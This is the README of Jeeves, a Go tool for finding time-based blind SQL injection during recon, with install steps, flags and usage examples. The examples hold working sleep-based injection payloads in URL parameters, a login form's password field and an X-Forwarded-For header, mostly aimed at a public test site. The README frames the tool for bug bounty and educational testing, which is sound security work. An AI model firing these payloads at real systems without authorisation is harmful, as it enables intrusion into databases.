Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
- Installation & Requirements:
Installing Jeeves
OR
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
- Usage & Explanation:
In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1
Single urls
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10
In --payload-time you must use the time mentioned in payload
From list
cat targets | jeeves --payload-time 5
Adding Headers
Pay attention to the syntax! Must be the same =>
Using proxy
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"
Proxy + Headers =>
Post Request
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"
Another ways of Usage
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags:
traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">
Usage:-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message
Using with sql payloads wordlist
Testing in headers
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
Payload credit: https://github.com/rohit0x5
OBS:
Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys" Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )This project is for educational and bug bounty porposes only! I do not support any illegal activities!.
If any error in the program, talk to me immediatly.
Please, also check these =>
Nilo - Checks if URL has status 200
Blisqy Header time based SQLI